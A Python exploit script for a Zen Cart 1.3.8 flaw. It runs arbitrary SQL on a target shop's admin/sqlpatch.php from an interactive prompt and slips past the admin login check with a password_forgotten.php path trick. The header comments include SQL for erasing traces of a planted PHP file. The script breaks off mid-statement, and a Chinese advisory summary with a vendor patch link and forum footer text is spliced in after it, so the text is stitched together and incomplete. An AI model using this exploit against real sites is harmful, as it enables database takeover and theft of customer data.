#!/usr/bin/python
#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
import urllib, urllib2, re, sys
a,b = sys.argv,0
def option(name, need = 0):
global a, b
for param in sys.argv:
if(param == '-'+name): return str(sys.argv[b+1])
b = b + 1
if(need):
print '/n#error', "-"+name, 'parameter required'
exit(1)
if (len(sys.argv) < 2):
print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| $system> python """+sys.argv[0]+""" -url <url> |
| Param: <url> ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |
========================================================================
"""
exit(1)
url, trick = option('url', 1), "/password_forgotten.php"
while True:
cmd = raw_input('sql@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
print '>> success (', cmd, ")"
else:
影响版本:
Zen Cart 1.3.8
程序介绍:
Zen Cart是一款免费开源的购物车软件。
漏洞分析:
Zen Cart 没有对admin/sqlpatch.php模块强制管理认证,这允许远程攻击者在请求中通过query_string和PATH_INFO参数执行 SQL注入攻击。
解决方案:
厂商补丁:
Zen Ventures
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zen-cart.com/forum/showthread.php?t=130161
1212
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
